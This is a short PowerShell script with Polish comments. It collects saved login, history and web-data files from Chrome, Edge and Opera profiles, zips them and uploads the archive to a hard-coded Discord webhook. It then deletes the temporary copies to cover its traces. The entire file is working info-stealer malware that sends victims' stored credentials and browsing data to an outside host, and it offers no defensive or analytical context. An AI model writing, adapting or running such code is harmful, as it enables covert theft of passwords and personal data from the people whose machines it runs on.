# Lokalizacja plików przeglądarek
$Paths = @{
    Chrome = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
    Edge = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
    Opera = "$env:APPDATA\Opera Software\Opera Stable"
}

# Tymczasowy folder na dane
$TempFolder = Join-Path $env:TEMP "BrowserData"
New-Item -ItemType Directory -Path $TempFolder -Force | Out-Null

# Kopiowanie plików przeglądarek
foreach ($Browser in $Paths.Keys) {
    $BrowserFolder = Join-Path $TempFolder $Browser
    New-Item -ItemType Directory -Path $BrowserFolder -Force | Out-Null

    foreach ($File in @("Login Data", "History", "Web Data")) {
        $SourcePath = Join-Path $Paths[$Browser] $File
        if (Test-Path $SourcePath) {
            Copy-Item -Path $SourcePath -Destination $BrowserFolder -Force
        }
    }
}

# Funkcja tworzenia archiwum ZIP za pomocą System.IO.Compression
function Create-ZipFile {
    param (
        [string]$SourcePath,
        [string]$DestinationPath
    )

    Add-Type -AssemblyName "System.IO.Compression.FileSystem"
    [System.IO.Compression.ZipFile]::CreateFromDirectory($SourcePath, $DestinationPath)
}

# Tworzenie ZIP z użyciem nowej funkcji
$ZipPath = Join-Path $env:TEMP "BrowserData.zip"
if (Test-Path $ZipPath) { Remove-Item -Path $ZipPath -Force }

try {
    Create-ZipFile -SourcePath $TempFolder -DestinationPath $ZipPath
} catch {
    Write-Host "Błąd podczas kompresji plików: $_"
    Exit 1
}

# Webhook Discord
$WebhookURL = "https://discord.com/api/webhooks/1327027314587996321/3By2GaZl0B40tgJFqW-pJSjm09qg8bX6ogGi3g9T27d_nef7V-F8nJhUNL3VtUakMYtd"

# Wysyłanie pliku ZIP na Discord
if (Test-Path $ZipPath) {
    try {
        Invoke-WebRequest -Uri $WebhookURL -Method POST -Form @{file = Get-Item $ZipPath}
    } catch {
        Write-Host "Błąd podczas wysyłania pliku na webhook: $_"
        Exit 1
    }
} else {
    Write-Host "Plik ZIP nie został znaleziony."
    Exit 1
}

# Czyszczenie plików tymczasowych
Remove-Item -Recurse -Force $TempFolder
Remove-Item -Force $ZipPath
